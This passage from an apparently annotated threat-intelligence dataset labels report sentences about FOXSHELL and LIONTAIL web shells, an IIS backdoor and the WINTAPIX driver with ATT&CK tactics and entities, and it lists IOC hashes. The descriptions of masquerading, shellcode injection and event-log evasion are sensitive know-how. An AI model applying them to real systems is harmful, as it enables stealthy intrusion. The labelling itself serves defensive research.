methods.", "sentence_text": "However, both are just simple base64 encoding:\n21/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p22-s142-fd02eb", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 22, "sentence_id": 142, "context_before": "However, both are just simple base64 encoding:\n21/31", "sentence_text": "Although this simple encoding could be done in the code of the web shell itself, the existence of other embedded DLLs, such as XORO.dll (described previously), and the ability to provide yet another EncryptionDll on the configuration stage, implies that the attackers prefer to control which specific type of encryption they want to use by default in certain environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p22-s143-f362e5", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 22, "sentence_id": 143, "context_before": "Although this simple encoding could be done in the code of the web shell itself, the existence of other embedded DLLs, such as XORO.dll (described previously), and the ability to provide yet another EncryptionDll on the configuration stage, implies that the attackers prefer to control which specific type of encryption they want to use by default in certain environments.", "sentence_text": "The code of these classes remains the same:\n22/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p23-s144-c9e8a0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 23, "sentence_id": 144, "context_before": "The code of these classes remains the same:\n22/31", "sentence_text": "Through the exploitation of an Internet-facing Microsoft SharePoint server, the actors deployed ClientBin.aspx on the compromised server to proxy external connections and thus facilitate lateral movement throughout the victim’s environment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Exploit SharePoint server and deploy ClientBin.aspx web shell to proxy connections and enable lateral movement.", "entities": [ { "text": "the actors", "start": 76, "end": 86, "label": "ThreatActor" }, { "text": "exploitation of an Internet-facing Microsoft SharePoint server", "start": 12, "end": 74, "label": "Action" }, { "text": "deployed ClientBin.aspx on the compromised server", "start": 87, "end": 136, "label": "Action" }, { "text": "proxy external connections", "start": 140, "end": 166, "label": "Action" }, { "text": "facilitate lateral movement", "start": 176, "end": 203, "label": "Action" }, { "text": "ClientBin.aspx", "start": 96, "end": 110, "label": "MalwareTool" }, { "text": "Microsoft SharePoint server", "start": 47, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p23-s145-29422c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 23, "sentence_id": 145, "context_before": "Through the exploitation of an Internet-facing Microsoft SharePoint server, the actors deployed ClientBin.aspx on the compromised server to proxy external connections and thus facilitate lateral movement throughout the victim’s environment.", "sentence_text": "The details of the samples may vary but in all of them, the FOXHELL is compiled as DLL and embedded inside the base web shell in base64.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p23-s146-d838c8", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 23, "sentence_id": 146, "context_before": "The details of the samples may vary but in all of them, the FOXHELL is compiled as DLL and embedded inside the base web shell in base64.", "sentence_text": "The compiled DLL is loaded with System.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The DLL is loaded for execution.", "entities": [ { "text": "is loaded", "start": 17, "end": 26, "label": "Action" }, { "text": "compiled DLL", "start": 4, "end": 16, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p23-s149-45b117", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 23, "sentence_id": 149, "context_before": "Assembly.", "sentence_text": "Load, and then the ProcessRequest method from it is invoked.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The ProcessRequest method is executed.", "entities": [ { "text": "is invoked", "start": 49, "end": 59, "label": "Action" }, { "text": "ProcessRequest method", "start": 19, "end": 40, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p23-s150-eca7d4", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 23, "sentence_id": 150, "context_before": "Load, and then the ProcessRequest method from it is invoked.", "sentence_text": "The DLL is written in .NET and has the name pattern App_Web_.dll, which indicates an ASP.NET dynamically compiled DLL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p24-s152-3e6b06", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 24, "sentence_id": 152, "context_before": "and classes.", "sentence_text": "In this case, the initialization happens in the following piece of code:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p24-s153-34c4cd", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 24, "sentence_id": 153, "context_before": "In this case, the initialization happens in the following piece of code:", "sentence_text": "Or, after deobfuscation:\npublic concertthis_medal() { base.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p24-s154-4b54c0", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 24, "sentence_id": 154, "context_before": "Or, after deobfuscation:\npublic concertthis_medal() { base.", "sentence_text": "AppRelativeVirtualPath", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s156-6131c5", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 156, "context_before": "= \"~/1.aspx\" 24/31", "sentence_text": "if (!concertthis_medal.__initialized) { concertthis_medal.__fileDependencies = base.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s157-b6edb2", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 157, "context_before": "if (!concertthis_medal.__initialized) { concertthis_medal.__fileDependencies = base.", "sentence_text": "GetWrappedFileDependencies(new string{\"~/1.aspx\"});\nconcertthis_medal.__initialized = true; } This initialization sets the FOXSHELL to listen to the requests on the relative path ~/1.aspx, which we observed as an unused artifact in other web shells related to attacks involving LIONTAIL.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "The web shell listens for incoming requests on a specific path.", "entities": [ { "text": "sets the FOXSHELL to listen to the requests", "start": 114, "end": 157, "label": "Action" }, { "text": "FOXSHELL", "start": 123, "end": 131, "label": "MalwareTool" }, { "text": "~/1.aspx", "start": 179, "end": 187, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p25-s158-6a275b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 158, "context_before": "GetWrappedFileDependencies(new string{\"~/1.aspx\"});\nconcertthis_medal.__initialized = true; } This initialization sets the FOXSHELL to listen to the requests on the relative path ~/1.aspx, which we observed as an unused artifact in other web shells related to attacks involving LIONTAIL.", "sentence_text": "Standalone backdoor based on IIS ServerManager and HTTPListener Since mid-2020, in addition to the FOXSHELL as a means to proxy the traffic, we also observed a rather sophisticated standalone passive backdoor, written in .NET and meant to be deployed on IIS servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s159-69a737", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 159, "context_before": "Standalone backdoor based on IIS ServerManager and HTTPListener Since mid-2020, in addition to the FOXSHELL as a means to proxy the traffic, we also observed a rather sophisticated standalone passive backdoor, written in .NET and meant to be deployed on IIS servers.", "sentence_text": "It is obfuscated with similar techniques as FOXSHELL and masquerades as System.Drawing.Design.dll.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Obfuscate malware and masquerade it as System.Drawing.Design.dll.", "entities": [ { "text": "obfuscated", "start": 6, "end": 16, "label": "Action" }, { "text": "masquerades as System.Drawing.Design.dll", "start": 57, "end": 97, "label": "Action" }, { "text": "System.Drawing.Design.dll", "start": 72, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p25-s160-da0888", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 160, "context_before": "It is obfuscated with similar techniques as FOXSHELL and masquerades as System.Drawing.Design.dll.", "sentence_text": "The SDD backdoor was previously analyzed by a Saudi researcher but was never attributed to a specific threat actor or campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s161-ccb33c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 161, "context_before": "The SDD backdoor was previously analyzed by a Saudi researcher but was never attributed to a specific threat actor or campaign.", "sentence_text": "C&C Communication\nThe SSD backdoor sets up C&C communication through an HTTP listener on the infected machine.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Establish C2 communication via HTTP listener on infected machine.", "entities": [ { "text": "sets up C&C communication through an HTTP listener", "start": 35, "end": 85, "label": "Action" }, { "text": "HTTP listener", "start": 72, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p25-s162-630e46", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 162, "context_before": "C&C Communication\nThe SSD backdoor sets up C&C communication through an HTTP listener on the infected machine.", "sentence_text": "It is achieved using two classes:\nServerManager – A part of the System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s163-d7ff64", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 163, "context_before": "It is achieved using two classes:\nServerManager – A part of the System.", "sentence_text": "Web.Administration namespace in .NET used for managing and configuring Internet Information Services (IIS) on a Windows server, such as get configuration, create, modify, or delete IIS sites, applications, and application pools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s164-224892", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 164, "context_before": "Web.Administration namespace in .NET used for managing and configuring Internet Information Services (IIS) on a Windows server, such as get configuration, create, modify, or delete IIS sites, applications, and application pools.", "sentence_text": "servers, independent of IIS and based on HTTP API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p25-s165-4e52eb", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 25, "sentence_id": 165, "context_before": "servers, independent of IIS and based on HTTP API.", "sentence_text": "ServerManager is used to extract the sites hosted by the IIS server and build the HashSet of URL prefixes to listen on:\n25/31", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "The malware extracts site information and prepares URL prefixes for listening.", "entities": [ { "text": "is used to extract the sites", "start": 14, "end": 42, "label": "Action" }, { "text": "build the HashSet of URL prefixes to listen on", "start": 72, "end": 118, "label": "Action" }, { "text": "IIS server", "start": 57, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p26-s166-0fb580", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 26, "sentence_id": 166, "context_before": "ServerManager is used to extract the sites hosted by the IIS server and build the HashSet of URL prefixes to listen on:\n25/31", "sentence_text": "based on sites and bindings configured on the IIS server (Illdefy array provides the relative URls).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p26-s167-8ed87b", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 26, "sentence_id": 167, "context_before": "based on sites and bindings configured on the IIS server (Illdefy array provides the relative URls).", "sentence_text": "In this specific case, the only relative URI configured in the malware sample is Temporary_Listen_Addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p26-s168-be100f", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 26, "sentence_id": 168, "context_before": "In this specific case, the only relative URI configured in the malware sample is Temporary_Listen_Addresses.", "sentence_text": "The malware then uses the HttpListener class to start listening on the specified URL prefixes:\nC&C command execution The backdoor has several capabilities: execute commands using cmd.exe, upload and download files, execute processes with specified arguments, and run additional .NET assemblies.\n26/31", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "The malware listens for requests and executes commands.", "entities": [ { "text": "uses the HttpListener class to start listening", "start": 17, "end": 63, "label": "Action" }, { "text": "execute commands", "start": 156, "end": 172, "label": "Action" }, { "text": "cmd.exe", "start": 179, "end": 186, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p27-s169-954d57", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 27, "sentence_id": 169, "context_before": "The malware then uses the HttpListener class to start listening on the specified URL prefixes:\nC&C command execution The backdoor has several capabilities: execute commands using cmd.exe, upload and download files, execute processes with specified arguments, and run additional .NET assemblies.\n26/31", "sentence_text": "The data from the POST request is encrypted using Base64 and simple XOR-based encryption:\nAfter decrypting the data of the message, the malware parses it according to the following order:\nDWORD command_type\nDWORD command_name_length\nSTRING command_name\n27/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s170-f18e76", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 170, "context_before": "The data from the POST request is encrypted using Base64 and simple XOR-based encryption:\nAfter decrypting the data of the message, the malware parses it according to the following order:\nDWORD command_type\nDWORD command_name_length\nSTRING command_name\n27/31", "sentence_text": "In this case, the data is parsed to extract the process name and its argument.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The malware parses data to extract execution parameters.", "entities": [ { "text": "is parsed to extract", "start": 23, "end": 43, "label": "Action" }, { "text": "process name", "start": 48, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p28-s171-913017", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 171, "context_before": "In this case, the data is parsed to extract the process name and its argument.", "sentence_text": "“Upload” – Uploads a file to the specified path in the infected system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s172-fd9e7d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 172, "context_before": "“Upload” – Uploads a file to the specified path in the infected system.", "sentence_text": "“Download” – Sends a specified file to the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s173-9bc9cc", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 173, "context_before": "“Download” – Sends a specified file to the threat actors.", "sentence_text": "“Rundll” – Loads assembly and runs it with specified parameter (if exists).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s174-819796", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 174, "context_before": "“Rundll” – Loads assembly and runs it with specified parameter (if exists).", "sentence_text": "Although the exact infection chain to install the drivers is unknown, they target only IIS servers as they use the IIS ServerManager object.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s175-91fd69", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 175, "context_before": "Although the exact infection chain to install the drivers is unknown, they target only IIS servers as they use the IIS ServerManager object.", "sentence_text": "The high-level execution flow is the following:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s176-088b62", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 176, "context_before": "The high-level execution flow is the following:\n1.", "sentence_text": "WINTAPIX driver is loaded in the kernel.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Load a malicious driver into the kernel.", "entities": [ { "text": "is loaded in the kernel", "start": 16, "end": 39, "label": "Action" }, { "text": "WINTAPIX driver", "start": 0, "end": 15, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p28-s177-d466ce", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 177, "context_before": "WINTAPIX driver is loaded in the kernel.", "sentence_text": "WINTAPIX driver enumerates user-mode processes to find a suitable process with local system privileges.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Enumerate user-mode processes to identify a suitable process with elevated privileges.", "entities": [ { "text": "enumerates user-mode processes to find a suitable process with local system privileges", "start": 16, "end": 102, "label": "Action" }, { "text": "WINTAPIX driver", "start": 0, "end": 15, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p28-s178-3babb5", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 178, "context_before": "WINTAPIX driver enumerates user-mode processes to find a suitable process with local system privileges.", "sentence_text": "WINTAPIX driver injects an embedded shellcode into a previously found process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Inject embedded shellcode into a process.", "entities": [ { "text": "injects an embedded shellcode into a previously found process", "start": 16, "end": 77, "label": "Action" }, { "text": "shellcode", "start": 36, "end": 45, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p28-s179-ffbc2d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 179, "context_before": "WINTAPIX driver injects an embedded shellcode into a previously found process.", "sentence_text": "The shellcode is generated using the open-source Donut project, which allows the creation of a position-independent shellcode capable of loading and executing .NET assemblies from memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p28-s180-382aaf", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 28, "sentence_id": 180, "context_before": "The shellcode is generated using the open-source Donut project, which allows the creation of a position-independent shellcode capable of loading and executing .NET assemblies from memory.", "sentence_text": "The injected shellcode loads and executes an encrypted .NET payload.\n28/31", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Load and execute an encrypted .NET payload via injected shellcode.", "entities": [ { "text": "loads and executes an encrypted .NET payload", "start": 23, "end": 67, "label": "Action" }, { "text": "shellcode", "start": 13, "end": 22, "label": "MalwareTool" } ] }, { "uid": "aptnotes-04_aptnotes_report-p29-s181-33e480", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 29, "sentence_id": 181, "context_before": "The injected shellcode loads and executes an encrypted .NET payload.\n28/31", "sentence_text": "The FOXSHELL version used within the driver payload is set to 1.7.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p29-s182-74f5e3", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 29, "sentence_id": 182, "context_before": "The FOXSHELL version used within the driver payload is set to 1.7.", "sentence_text": "The main enhancement introduced in this version is the Event Log bypass using a known technique of suspending EventLog Service threads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p29-s183-be4959", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 29, "sentence_id": 183, "context_before": "The main enhancement introduced in this version is the Event Log bypass using a known technique of suspending EventLog Service threads.", "sentence_text": "The default EncryptionDll hardcoded in the driver is the same Bsae64.dll, and the core proxy structure remains largely unaltered when compared to FOXSHELL version 1.5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p29-s184-58ff39", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 29, "sentence_id": 184, "context_before": "The default EncryptionDll hardcoded in the driver is the same Bsae64.dll, and the core proxy structure remains largely unaltered when compared to FOXSHELL version 1.5.", "sentence_text": "The same supported backdoor command types and encryption with the same key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p29-s185-09d48a", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 29, "sentence_id": 185, "context_before": "The same supported backdoor command types and encryption with the same key.", "sentence_text": "The same obfuscation and encryption methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s186-8c28d2", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 186, "context_before": "The same obfuscation and encryption methods.", "sentence_text": "Examining the history of their activities, it becomes evident how far the threat actor has come in improving their attacks and enhancing their approach which relies on passive implants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s187-eae5e4", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 187, "context_before": "Examining the history of their activities, it becomes evident how far the threat actor has come in improving their attacks and enhancing their approach which relies on passive implants.", "sentence_text": "While LIONTAIL represents a logical progression in the evolution of FOXSHELL and still bears some distinctive characteristics that allow us to attribute attacks involving LIONTAIL to Scarred Manticore, it stands out from other observed variants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s188-a63d3e", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 188, "context_before": "While LIONTAIL represents a logical progression in the evolution of FOXSHELL and still bears some distinctive characteristics that allow us to attribute attacks involving LIONTAIL to Scarred Manticore, it stands out from other observed variants.", "sentence_text": "Instead, it utilizes the lowest level of Windows HTTP Stack by interacting directly with the HTTP.sys driver.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The malware communicates via direct interaction with HTTP.sys.", "entities": [ { "text": "utilizes the lowest level of Windows HTTP Stack", "start": 12, "end": 59, "label": "Action" }, { "text": "interacting directly with the HTTP.sys driver", "start": 63, "end": 108, "label": "Action" }, { "text": "HTTP.sys", "start": 93, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-04_aptnotes_report-p30-s189-d4a078", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 189, "context_before": "Instead, it utilizes the lowest level of Windows HTTP Stack by interacting directly with the HTTP.sys driver.", "sentence_text": "All those have enhanced the stealth ability of the implants, enabling them to evade detection for an extended period.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s190-c863dd", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 190, "context_before": "All those have enhanced the stealth ability of the implants, enabling them to evade detection for an extended period.", "sentence_text": "We expect that Scarred Manticore operations will persist and may spread into other regions as per Iranian long-term interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s191-f15676", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 191, "context_before": "We expect that Scarred Manticore operations will persist and may spread into other regions as per Iranian long-term interests.", "sentence_text": "While most of the recent activity of Scarred Manticore is primarily focused on maintaining covert access and data extraction, the troubling example of the attack on the Albanian government networks serves as a reminder that nation-state actors may collaborate and share access with their counterparts in intelligence agencies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s193-d1b29d", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 193, "context_before": "IPS:\nBackdoor.", "sentence_text": "WIN32.Liontail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p30-s194-a3b66c", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 30, "sentence_id": 194, "context_before": "WIN32.Liontail.", "sentence_text": "A/B\nThreat Emulation:\nAPT.Wins.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-04_aptnotes_report-p31-s197-eaea13", "source": "aptnotes", "doc_id": "04_aptnotes_report", "page_number": 31, "sentence_id": 197, "context_before": "C/D\nIOCs\n30/31", "sentence_text": "daa362f070ba121b9a2fa3567abc345edcde33c54cabefa71dd2faad78c10c33\nf4639c63fb01875946a4272c3515f005d558823311d0ee4c34896c2b66122596\n2097320e71990865f04b9484858d279875cf5c66a5f6d12c819a34e2385da838\n67560e05383e38b2fcc30df84f0792ad095d5594838087076b214d849cde9542\n4f6351b8fb3f49ff0061ee6f338cd1af88893ed20e71e211e8adb6b90e50a3b8\nf6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d\n1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e\n8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330\nc5b4542d61af74cf7454d7f1c8d96218d709de38f94ccfa7c16b15f726dc08c0\n9117bd328e37be121fb497596a2d0619a0eaca44752a1854523b8af46a5b0ceb\ne1ad173e49eee1194f2a55afa681cef7c3b8f6c26572f474dec7a42e9f0cdc9d\na2598161e1efff623de6128ad8aafba9da0300b6f86e8c951e616bd19f0a572b\n7495c1ea421063845eb8f4599a1c17c105f700ca0671ca874c5aa5aef3764c1c\n6f0a38c9eb9171cd323b0f599b74ee571620bc3f34aa07435e7c5822663de605\n3875ed58c0d42e05c83843b32ed33d6ba5e94e18ffe8fb1bf34fd7dedf3f82a7\n1146b1f38e420936b7c5f6b22212f3aa93515f3738c861f499ed1047865549cb\nb71aa5f27611a2089a5bbe34fd1aafb45bd71824b4f8c2465cf4754db746aa79\nda450c639c9a50377233c0f195c3f6162beb253f320ed57d5c9bb9c7f0e83999\nGO UP\n31/31", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p1-s1-6d7ec9", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Threat Actor 'UAC-0099' Continues to Target Ukraine deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine December 21, 2023 DECEMBER 21, 2023 Deep Instinct Threat Lab Key Takeaways \"UAC-0099\" is a threat actor that has targeted Ukraine since mid-2022 Deep Instinct Threat Lab has identified new attacks by the threat actor The threat actor was observed leveraging CVE-2023-38831 The threat actor targets Ukrainian employees working for companies outside of Ukraine Introduction In May 2023, the Ukrainian CERT published advisory #6710 about a threat actor dubbed “UAC-0099.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p1-s2-c4599a", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Threat Actor 'UAC-0099' Continues to Target Ukraine deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine December 21, 2023 DECEMBER 21, 2023 Deep Instinct Threat Lab Key Takeaways \"UAC-0099\" is a threat actor that has targeted Ukraine since mid-2022 Deep Instinct Threat Lab has identified new attacks by the threat actor The threat actor was observed leveraging CVE-2023-38831 The threat actor targets Ukrainian employees working for companies outside of Ukraine Introduction In May 2023, the Ukrainian CERT published advisory #6710 about a threat actor dubbed “UAC-0099.”", "sentence_text": "The advisory briefly details the threat actor’s activities and tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p1-s3-e77503", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The advisory briefly details the threat actor’s activities and tools.", "sentence_text": "Since the CERT-UA publication in May, Deep Instinct has identified new attacks carried out by “UAC-0099” against Ukrainian targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p1-s4-2e68c3", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "Since the CERT-UA publication in May, Deep Instinct has identified new attacks carried out by “UAC-0099” against Ukrainian targets.", "sentence_text": "Important note: Some of the C2 servers related to these attacks are still active at the time of publication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-05_aptnotes_report-p2-s6-7d25e4", "source": "aptnotes", "doc_id": "05_aptnotes_report", "page_number": 2, "sentence_id": 6, "context_before": "1/11", "sentence_text": "RAR SFX with LNK Infection Vector In early August, “UAC-0099” sent an email impersonating the Lviv city court using the ukr.net The email was sent to a corporate email box of a Ukrainian employee 